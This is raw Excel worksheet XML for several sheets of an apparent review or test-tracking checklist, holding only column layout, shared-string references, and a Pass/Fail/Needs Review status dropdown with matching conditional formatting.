      <formula1>"Not Started,In Progress,Pass,Fail,N/A,Needs Review"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43C0C"/>
  </sheetPr>
  <dimension ref="A1:H7"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="2" topLeftCell="A3" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="E3" sqref="E3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="16" customWidth="1"/>
    <col min="2" max="2" width="28" customWidth="1"/>
    <col min="3" max="3" width="38" customWidth="1"/>
    <col min="4" max="4" width="30" customWidth="1"/>
    <col min="5" max="5" width="50" customWidth="1"/>
    <col min="6" max="6" width="35" customWidth="1"/>
    <col min="7" max="7" width="18" customWidth="1"/>
    <col min="8" max="8" width="22" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="24.6" x14ac:dyDescent="0.3">
      <c r="A1" s="37" t="s">
        <v>240</v>
      </c>
      <c r="B1" s="29"/>
      <c r="C1" s="29"/>
      <c r="D1" s="29"/>
      <c r="E1" s="29"/>
      <c r="F1" s="29"/>
      <c r="G1" s="29"/>
      <c r="H1" s="29"/>
    </row>
    <row r="2" spans="1:8" ht="15.6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</row>
    <row r="3" spans="1:8" ht="207" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>241</v>
      </c>
      <c r="B3" s="3" t="s">
        <v>242</v>
      </c>
      <c r="C3" s="4" t="s">
        <v>243</v>
      </c>
      <c r="D3" s="5" t="s">
        <v>45</v>
      </c>
      <c r="E3" s="4" t="s">
        <v>244</v>
      </c>
      <c r="F3" s="3" t="s">
        <v>245</v>
      </c>
      <c r="G3" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H3" s="4"/>
    </row>
    <row r="4" spans="1:8" ht="207" x14ac:dyDescent="0.3">
      <c r="A4" s="7" t="s">
        <v>246</v>
      </c>
      <c r="B4" s="8" t="s">
        <v>247</v>
      </c>
      <c r="C4" s="9" t="s">
        <v>248</v>
      </c>
      <c r="D4" s="10" t="s">
        <v>249</v>
      </c>
      <c r="E4" s="9" t="s">
        <v>250</v>
      </c>
      <c r="F4" s="8" t="s">
        <v>251</v>
      </c>
      <c r="G4" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H4" s="9"/>
    </row>
    <row r="5" spans="1:8" ht="234.6" x14ac:dyDescent="0.3">
      <c r="A5" s="2" t="s">
        <v>252</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>253</v>
      </c>
      <c r="C5" s="4" t="s">
        <v>254</v>
      </c>
      <c r="D5" s="5" t="s">
        <v>255</v>
      </c>
      <c r="E5" s="4" t="s">
        <v>256</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>257</v>
      </c>
      <c r="G5" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H5" s="4"/>
    </row>
    <row r="6" spans="1:8" ht="220.8" x14ac:dyDescent="0.3">
      <c r="A6" s="7" t="s">
        <v>258</v>
      </c>
      <c r="B6" s="8" t="s">
        <v>259</v>
      </c>
      <c r="C6" s="9" t="s">
        <v>260</v>
      </c>
      <c r="D6" s="10" t="s">
        <v>142</v>
      </c>
      <c r="E6" s="9" t="s">
        <v>261</v>
      </c>
      <c r="F6" s="8" t="s">
        <v>262</v>
      </c>
      <c r="G6" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H6" s="9"/>
    </row>
    <row r="7" spans="1:8" ht="179.4" x14ac:dyDescent="0.3">
      <c r="A7" s="2" t="s">
        <v>263</v>
      </c>
      <c r="B7" s="3" t="s">
        <v>264</v>
      </c>
      <c r="C7" s="4" t="s">
        <v>265</v>
      </c>
      <c r="D7" s="5" t="s">
        <v>266</v>
      </c>
      <c r="E7" s="4" t="s">
        <v>267</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>268</v>
      </c>
      <c r="G7" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H7" s="4"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A1:H1"/>
  </mergeCells>
  <conditionalFormatting sqref="G3:G7">
    <cfRule type="cellIs" dxfId="29" priority="1" operator="equal">
      <formula>"Pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="28" priority="2" operator="equal">
      <formula>"Fail"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="27" priority="3" operator="equal">
      <formula>"In Progress"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="26" priority="4" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="25" priority="5" operator="equal">
      <formula>"Needs Review"</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" showInputMessage="1" showErrorMessage="1" errorTitle="Invalid Status" error="Please select a valid status from the dropdown." promptTitle="Status" prompt="Select: Not Started / In Progress / Pass / Fail / N/A / Needs Review" sqref="G3:G7" xr:uid="{00000000-0002-0000-0500-000000000000}">
      <formula1>"Not Started,In Progress,Pass,Fail,N/A,Needs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H8"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="2" topLeftCell="A3" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="E4" sqref="E4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="16" customWidth="1"/>
    <col min="2" max="2" width="28" customWidth="1"/>
    <col min="3" max="3" width="38" customWidth="1"/>
    <col min="4" max="4" width="30" customWidth="1"/>
    <col min="5" max="5" width="50" customWidth="1"/>
    <col min="6" max="6" width="35" customWidth="1"/>
    <col min="7" max="7" width="18" customWidth="1"/>
    <col min="8" max="8" width="22" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="24.6" x14ac:dyDescent="0.3">
      <c r="A1" s="37" t="s">
        <v>269</v>
      </c>
      <c r="B1" s="29"/>
      <c r="C1" s="29"/>
      <c r="D1" s="29"/>
      <c r="E1" s="29"/>
      <c r="F1" s="29"/>
      <c r="G1" s="29"/>
      <c r="H1" s="29"/>
    </row>
    <row r="2" spans="1:8" ht="15.6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</row>
    <row r="3" spans="1:8" ht="179.4" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>270</v>
      </c>
      <c r="B3" s="3" t="s">
        <v>271</v>
      </c>
      <c r="C3" s="4" t="s">
        <v>272</v>
      </c>
      <c r="D3" s="5" t="s">
        <v>148</v>
      </c>
      <c r="E3" s="4" t="s">
        <v>273</v>
      </c>
      <c r="F3" s="3" t="s">
        <v>274</v>
      </c>
      <c r="G3" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H3" s="4"/>
    </row>
    <row r="4" spans="1:8" ht="207" x14ac:dyDescent="0.3">
      <c r="A4" s="7" t="s">
        <v>275</v>
      </c>
      <c r="B4" s="8" t="s">
        <v>276</v>
      </c>
      <c r="C4" s="9" t="s">
        <v>277</v>
      </c>
      <c r="D4" s="10" t="s">
        <v>278</v>
      </c>
      <c r="E4" s="9" t="s">
        <v>279</v>
      </c>
      <c r="F4" s="8" t="s">
        <v>280</v>
      </c>
      <c r="G4" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H4" s="9"/>
    </row>
    <row r="5" spans="1:8" ht="220.8" x14ac:dyDescent="0.3">
      <c r="A5" s="2" t="s">
        <v>281</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>282</v>
      </c>
      <c r="C5" s="4" t="s">
        <v>283</v>
      </c>
      <c r="D5" s="5" t="s">
        <v>284</v>
      </c>
      <c r="E5" s="4" t="s">
        <v>285</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>286</v>
      </c>
      <c r="G5" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H5" s="4"/>
    </row>
    <row r="6" spans="1:8" ht="193.2" x14ac:dyDescent="0.3">
      <c r="A6" s="7" t="s">
        <v>287</v>
      </c>
      <c r="B6" s="8" t="s">
        <v>288</v>
      </c>
      <c r="C6" s="9" t="s">
        <v>289</v>
      </c>
      <c r="D6" s="10" t="s">
        <v>290</v>
      </c>
      <c r="E6" s="9" t="s">
        <v>291</v>
      </c>
      <c r="F6" s="8" t="s">
        <v>292</v>
      </c>
      <c r="G6" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H6" s="9"/>
    </row>
    <row r="7" spans="1:8" ht="165.6" x14ac:dyDescent="0.3">
      <c r="A7" s="2" t="s">
        <v>293</v>
      </c>
      <c r="B7" s="3" t="s">
        <v>294</v>
      </c>
      <c r="C7" s="4" t="s">
        <v>295</v>
      </c>
      <c r="D7" s="5" t="s">
        <v>290</v>
      </c>
      <c r="E7" s="4" t="s">
        <v>296</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>297</v>
      </c>
      <c r="G7" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H7" s="4"/>
    </row>
    <row r="8" spans="1:8" ht="151.80000000000001" x14ac:dyDescent="0.3">
      <c r="A8" s="7" t="s">
        <v>298</v>
      </c>
      <c r="B8" s="8" t="s">
        <v>299</v>
      </c>
      <c r="C8" s="9" t="s">
        <v>300</v>
      </c>
      <c r="D8" s="10" t="s">
        <v>160</v>
      </c>
      <c r="E8" s="9" t="s">
        <v>301</v>
      </c>
      <c r="F8" s="8" t="s">
        <v>302</v>
      </c>
      <c r="G8" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H8" s="9"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A1:H1"/>
  </mergeCells>
  <conditionalFormatting sqref="G3:G8">
    <cfRule type="cellIs" dxfId="24" priority="1" operator="equal">
      <formula>"Pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="23" priority="2" operator="equal">
      <formula>"Fail"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="22" priority="3" operator="equal">
      <formula>"In Progress"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="21" priority="4" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="20" priority="5" operator="equal">
      <formula>"Needs Review"</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" showInputMessage="1" showErrorMessage="1" errorTitle="Invalid Status" error="Please select a valid status from the dropdown." promptTitle="Status" prompt="Select: Not Started / In Progress / Pass / Fail / N/A / Needs Review" sqref="G3:G8" xr:uid="{00000000-0002-0000-0600-000000000000}">
      <formula1>"Not Started,In Progress,Pass,Fail,N/A,Needs Review"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H5"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="2" topLeftCell="A3" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="E3" sqref="E3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="16" customWidth="1"/>
    <col min="2" max="2" width="28" customWidth="1"/>
    <col min="3" max="3" width="38" customWidth="1"/>
    <col min="4" max="4" width="30" customWidth="1"/>
    <col min="5" max="5" width="50" customWidth="1"/>
    <col min="6" max="6" width="35" customWidth="1"/>
    <col min="7" max="7" width="18" customWidth="1"/>
    <col min="8" max="8" width="22" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="24.6" x14ac:dyDescent="0.3">
      <c r="A1" s="37" t="s">
        <v>303</v>
      </c>
      <c r="B1" s="29"/>
      <c r="C1" s="29"/>
      <c r="D1" s="29"/>
      <c r="E1" s="29"/>
      <c r="F1" s="29"/>
      <c r="G1" s="29"/>
      <c r="H1" s="29"/>
    </row>
    <row r="2" spans="1:8" ht="15.6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</row>
    <row r="3" spans="1:8" ht="248.4" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>304</v>
      </c>
      <c r="B3" s="3" t="s">
        <v>305</v>
      </c>
      <c r="C3" s="4" t="s">
        <v>306</v>
      </c>
      <c r="D3" s="5" t="s">
        <v>307</v>
      </c>
      <c r="E3" s="4" t="s">
        <v>308</v>
      </c>
      <c r="F3" s="3" t="s">
        <v>309</v>
      </c>
      <c r="G3" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H3" s="4"/>
    </row>
    <row r="4" spans="1:8" ht="220.8" x14ac:dyDescent="0.3">
      <c r="A4" s="7" t="s">
        <v>310</v>
      </c>
      <c r="B4" s="8" t="s">
        <v>311</v>
      </c>
      <c r="C4" s="9" t="s">
        <v>312</v>
      </c>
      <c r="D4" s="10" t="s">
        <v>313</v>
      </c>
      <c r="E4" s="9" t="s">
        <v>314</v>
      </c>
      <c r="F4" s="8" t="s">
        <v>315</v>
      </c>
      <c r="G4" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H4" s="9"/>
    </row>
    <row r="5" spans="1:8" ht="193.2" x14ac:dyDescent="0.3">
      <c r="A5" s="2" t="s">
        <v>316</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>317</v>
      </c>
      <c r="C5" s="4" t="s">
        <v>318</v>
      </c>
      <c r="D5" s="5" t="s">
        <v>319</v>
      </c>
      <c r="E5" s="4" t="s">
        <v>320</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>321</v>
      </c>
      <c r="G5" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H5" s="4"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A1:H1"/>
  </mergeCells>
  <conditionalFormatting sqref="G3:G5">
    <cfRule type="cellIs" dxfId="19" priority="1" operator="equal">
      <formula>"Pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="18" priority="2" operator="equal">
      <formula>"Fail"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="17" priority="3" operator="equal">
      <formula>"In Progress"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="16" priority="4" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="15" priority="5" operator="equal">
      <formula>"Needs Review"</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" showInputMessage="1" showErrorMessage="1" errorTitle="Invalid Status" error="Please select a valid status from the dropdown." promptTitle="Status" prompt="Select: Not Started / In Progress / Pass / Fail / N/A / Needs Review" sqref="G3:G5" xr:uid="{00000000-0002-0000-0700-000000000000}">
      <formula1>"Not Started,In Progress,Pass,Fail,N/A,Needs Review"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H7"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="2" topLeftCell="A3" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="E4" sqref="E4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="16" customWidth="1"/>
    <col min="2" max="2" width="28" customWidth="1"/>
    <col min="3" max="3" width="38" customWidth="1"/>
    <col min="4" max="4" width="30" customWidth="1"/>
    <col min="5" max="5" width="50" customWidth="1"/>
    <col min="6" max="6" width="35" customWidth="1"/>
    <col min="7" max="7" width="18" customWidth="1"/>
    <col min="8" max="8" width="22" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="24.6" x14ac:dyDescent="0.3">
      <c r="A1" s="37" t="s">
        <v>322</v>
      </c>
      <c r="B1" s="29"/>
      <c r="C1" s="29"/>
      <c r="D1" s="29"/>
      <c r="E1" s="29"/>
      <c r="F1" s="29"/>
      <c r="G1" s="29"/>
      <c r="H1" s="29"/>
    </row>
    <row r="2" spans="1:8" ht="15.6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</row>
    <row r="3" spans="1:8" ht="193.2" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>323</v>
      </c>
      <c r="B3" s="3" t="s">
        <v>324</v>
      </c>
      <c r="C3" s="4" t="s">
        <v>325</v>
      </c>
      <c r="D3" s="5" t="s">
        <v>326</v>
      </c>
      <c r="E3" s="4" t="s">
        <v>327</v>
      </c>
      <c r="F3" s="3" t="s">
        <v>328</v>
      </c>
      <c r="G3" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H3" s="4"/>
    </row>
    <row r="4" spans="1:8" ht="193.2" x14ac:dyDescent="0.3">
      <c r="A4" s="7" t="s">
        <v>329</v>
      </c>
      <c r="B4" s="8" t="s">
        <v>330</v>
      </c>
      <c r="C4" s="9" t="s">
        <v>331</v>
      </c>
      <c r="D4" s="10" t="s">
        <v>284</v>
      </c>
      <c r="E4" s="9" t="s">
        <v>332</v>
      </c>
      <c r="F4" s="8" t="s">
        <v>333</v>
      </c>
      <c r="G4" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H4" s="9"/>
    </row>
    <row r="5" spans="1:8" ht="179.4" x14ac:dyDescent="0.3">
      <c r="A5" s="2" t="s">
        <v>334</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>335</v>
      </c>
      <c r="C5" s="4" t="s">
        <v>336</v>
      </c>
      <c r="D5" s="5" t="s">
        <v>337</v>
      </c>
      <c r="E5" s="4" t="s">
        <v>338</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>339</v>
      </c>
      <c r="G5" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H5" s="4"/>
    </row>
    <row r="6" spans="1:8" ht="207" x14ac:dyDescent="0.3">
      <c r="A6" s="7" t="s">
        <v>340</v>
      </c>
      <c r="B6" s="8" t="s">
        <v>341</v>
      </c>
      <c r="C6" s="9" t="s">
        <v>342</v>
      </c>
      <c r="D6" s="10" t="s">
        <v>343</v>
      </c>
      <c r="E6" s="9" t="s">
        <v>344</v>
      </c>
      <c r="F6" s="8" t="s">
        <v>345</v>
      </c>
      <c r="G6" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H6" s="9"/>
    </row>
    <row r="7" spans="1:8" ht="220.8" x14ac:dyDescent="0.3">
      <c r="A7" s="2" t="s">
        <v>346</v>
      </c>
      <c r="B7" s="3" t="s">
        <v>347</v>
      </c>
      <c r="C7" s="4" t="s">
        <v>348</v>
      </c>
      <c r="D7" s="5" t="s">
        <v>231</v>
      </c>
      <c r="E7" s="4" t="s">
        <v>349</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>350</v>
      </c>
      <c r="G7" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H7" s="4"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A1:H1"/>
  </mergeCells>
  <conditionalFormatting sqref="G3:G7">
    <cfRule type="cellIs" dxfId="14" priority="1" operator="equal">
      <formula>"Pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="13" priority="2" operator="equal">
      <formula>"Fail"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="12" priority="3" operator="equal">
      <formula>"In Progress"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="11" priority="4" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="10" priority="5" operator="equal">
      <formula>"Needs Review"</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" showInputMessage="1" showErrorMessage="1" errorTitle="Invalid Status" error="Please select a valid status from the dropdown." promptTitle="Status" prompt="Select: Not Started / In Progress / Pass / Fail / N/A / Needs Review" sqref="G3:G7" xr:uid="{00000000-0002-0000-0800-000000000000}">
      <formula1>"Not Started,In Progress,Pass,Fail,N/A,Needs Review"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8C00"/>
  </sheetPr>
  <dimension ref="A1:H6"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="2" topLeftCell="A3" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="D4" sqref="D4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="16" customWidth="1"/>
    <col min="2" max="2" width="28" customWidth="1"/>
    <col min="3" max="3" width="38" customWidth="1"/>
    <col min="4" max="4" width="30" customWidth="1"/>
    <col min="5" max="5" width="50" customWidth="1"/>
    <col min="6" max="6" width="35" customWidth="1"/>
    <col min="7" max="7" width="18" customWidth="1"/>
    <col min="8" max="8" width="22" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="24.6" x14ac:dyDescent="0.3">
      <c r="A1" s="37" t="s">
        <v>351</v>
      </c>
      <c r="B1" s="29"/>
      <c r="C1" s="29"/>
      <c r="D1" s="29"/>
      <c r="E1" s="29"/>
      <c r="F1" s="29"/>
      <c r="G1" s="29"/>
      <c r="H1" s="29"/>
    </row>
    <row r="2" spans="1:8" ht="15.6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</row>
    <row r="3" spans="1:8" ht="193.2" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>352</v>
      </c>
      <c r="B3" s="3" t="s">
        <v>353</v>
      </c>
      <c r="C3" s="4" t="s">
        <v>354</v>
      </c>
      <c r="D3" s="5" t="s">
        <v>148</v>
      </c>
      <c r="E3" s="4" t="s">
        <v>355</v>
      </c>
      <c r="F3" s="3" t="s">
        <v>356</v>
      </c>
      <c r="G3" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H3" s="4"/>
    </row>
    <row r="4" spans="1:8" ht="193.2" x14ac:dyDescent="0.3">
      <c r="A4" s="7" t="s">
        <v>357</v>
      </c>
      <c r="B4" s="8" t="s">
        <v>358</v>
      </c>
      <c r="C4" s="9" t="s">
        <v>359</v>
      </c>
      <c r="D4" s="10" t="s">
        <v>148</v>
      </c>
      <c r="E4" s="9" t="s">
        <v>360</v>
      </c>
      <c r="F4" s="8" t="s">
        <v>361</v>
      </c>
      <c r="G4" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H4" s="9"/>
    </row>
    <row r="5" spans="1:8" ht="220.8" x14ac:dyDescent="0.3">
      <c r="A5" s="2" t="s">
        <v>362</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>363</v>
      </c>
      <c r="C5" s="4" t="s">
        <v>364</v>
      </c>
      <c r="D5" s="5" t="s">
        <v>148</v>
      </c>
      <c r="E5" s="4" t="s">
        <v>365</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>366</v>
      </c>
      <c r="G5" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H5" s="4"/>
    </row>
    <row r="6" spans="1:8" ht="138" x14ac:dyDescent="0.3">
      <c r="A6" s="7" t="s">
        <v>367</v>
      </c>
      <c r="B6" s="8" t="s">
        <v>368</v>
      </c>
      <c r="C6" s="9" t="s">
        <v>369</v>
      </c>
      <c r="D6" s="10" t="s">
        <v>148</v>
      </c>
      <c r="E6" s="9" t="s">
        <v>370</v>
      </c>
      <c r="F6" s="8" t="s">
        <v>371</v>
      </c>
      <c r="G6" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H6" s="9"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A1:H1"/>
  </mergeCells>
  <conditionalFormatting sqref="G3:G6">
    <cfRule type="cellIs" dxfId="9" priority="1" operator="equal">
      <formula>"Pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="8" priority="2" operator="equal">
      <formula>"Fail"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="7" priority="3" operator="equal">
      <formula>"In Progress"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="6" priority="4" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="5" operator="equal">
      <formula>"Needs Review"</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" showInputMessage="1" showErrorMessage="1" errorTitle="Invalid Status" error="Please select a valid status from the dropdown." promptTitle="Status" prompt="Select: Not Started / In Progress / Pass / Fail / N/A / Needs Review" sqref="G3:G6" xr:uid="{00000000-0002-0000-0900-000000000000}">
      <formula1>"Not Started,In Progress,Pass,Fail,N/A,Needs Review"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H8"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="2" topLeftCell="A3" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="E4" sqref="E4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="16" customWidth="1"/>
    <col min="2" max="2" width="28" customWidth="1"/>
    <col min="3" max="3" width="38" customWidth="1"/>
    <col min="4" max="4" width="30" customWidth="1"/>
    <col min="5" max="5" width="50" customWidth="1"/>
    <col min="6" max="6" width="35" customWidth="1"/>
    <col min="7" max="7" width="18" customWidth="1"/>
    <col min="8" max="8" width="22" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="24.6" x14ac:dyDescent="0.3">
      <c r="A1" s="37" t="s">
        <v>372</v>
      </c>
      <c r="B1" s="29"/>
      <c r="C1" s="29"/>
      <c r="D1" s="29"/>
      <c r="E1" s="29"/>
      <c r="F1" s="29"/>
      <c r="G1" s="29"/>
      <c r="H1" s="29"/>
    </row>
    <row r="2" spans="1:8" ht="15.6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</row>
    <row r="3" spans="1:8" ht="165.6" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>373</v>
      </c>
      <c r="B3" s="3" t="s">
        <v>374</v>
      </c>
      <c r="C3" s="4" t="s">
        <v>375</v>
      </c>
      <c r="D3" s="5" t="s">
        <v>376</v>
      </c>
      <c r="E3" s="4" t="s">
        <v>377</v>
      </c>
      <c r="F3" s="3" t="s">
        <v>378</v>
      </c>
      <c r="G3" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H3" s="4"/>
    </row>
    <row r="4" spans="1:8" ht="179.4" x14ac:dyDescent="0.3">
      <c r="A4" s="7" t="s">
        <v>379</v>
      </c>
      <c r="B4" s="8" t="s">
        <v>380</v>
      </c>
      <c r="C4" s="9" t="s">
        <v>381</v>
      </c>
      <c r="D4" s="10" t="s">
        <v>382</v>
      </c>
      <c r="E4" s="9" t="s">
        <v>383</v>
      </c>
      <c r="F4" s="8" t="s">
        <v>384</v>
      </c>
      <c r="G4" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H4" s="9"/>
    </row>
    <row r="5" spans="1:8" ht="179.4" x14ac:dyDescent="0.3">
      <c r="A5" s="2" t="s">
        <v>385</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>386</v>
      </c>
      <c r="C5" s="4" t="s">
        <v>387</v>
      </c>
      <c r="D5" s="5" t="s">
        <v>388</v>
      </c>
      <c r="E5" s="4" t="s">
        <v>389</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>390</v>
      </c>
      <c r="G5" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H5" s="4"/>
    </row>
    <row r="6" spans="1:8" ht="220.8" x14ac:dyDescent="0.3">
      <c r="A6" s="7" t="s">
        <v>391</v>
      </c>
      <c r="B6" s="8" t="s">
        <v>392</v>
      </c>
      <c r="C6" s="9" t="s">
        <v>393</v>
      </c>
      <c r="D6" s="10" t="s">
        <v>394</v>
      </c>
      <c r="E6" s="9" t="s">
        <v>395</v>
      </c>
      <c r="F6" s="8" t="s">
        <v>396</v>
      </c>
      <c r="G6" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H6" s="9"/>
    </row>
    <row r="7" spans="1:8" ht="165.6" x14ac:dyDescent="0.3">
      <c r="A7" s="2" t="s">
        <v>397</v>
      </c>
      <c r="B7" s="3" t="s">
        <v>398</v>
      </c>
      <c r="C7" s="4" t="s">
        <v>399</v>
      </c>
      <c r="D7" s="5" t="s">
        <v>400</v>
      </c>
      <c r="E7" s="4" t="s">
        <v>401</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>402</v>
      </c>
      <c r="G7" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H7" s="4"/>
    </row>
    <row r="8" spans="1:8" ht="207" x14ac:dyDescent="0.3">
      <c r="A8" s="7" t="s">
        <v>403</v>
      </c>
      <c r="B8" s="8" t="s">
        <v>404</v>
      </c>
      <c r="C8" s="9" t="s">
        <v>405</v>
      </c>
      <c r="D8" s="10" t="s">
        <v>406</v>
      </c>
      <c r="E8" s="9" t="s">
        <v>407</v>
      </c>
      <c r="F8" s="8" t="s">
        <v>408</v>
      </c>
      <c r="G8" s="6" t="s">
        <v>4</v>
      </c>
      <c r="H8" s="9"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A1:H1"/>
  </mergeCells>
  <conditionalFormatting sqref="G3:G8">
    <cfRule type="cellIs" dxfId="4" priority="1" operator="equal">
      <formula>"Pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="2" operator="equal">
      <formula>"Fail"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="2" priority="3" operator="equal">
      <formula>"In Progress"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="1" priority="4" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="0" priority="5" operator="equal">
      <formula>"Needs Review"</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" showInputMessage="1" showErrorMessage="1" errorTitle="Invalid Status" error="Please select a valid status from the dropdown." promptTitle="Status" prompt="Select: Not Started / In Progress / Pass / Fail / N/A / Needs Review" sqref="G3:G8" xr:uid="{00000000-0002-0000-0A00-000000000000}">
      <formula1>"Not Started,In Progress,Pass,Fail,N/A,Needs Review"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95959"/>
  </sheetPr>
  <dimension ref="A1:F74"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="2" topLeftCell="A3" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="E65" sqref="E65"/>
    </sheetView>
  </sheetViews>
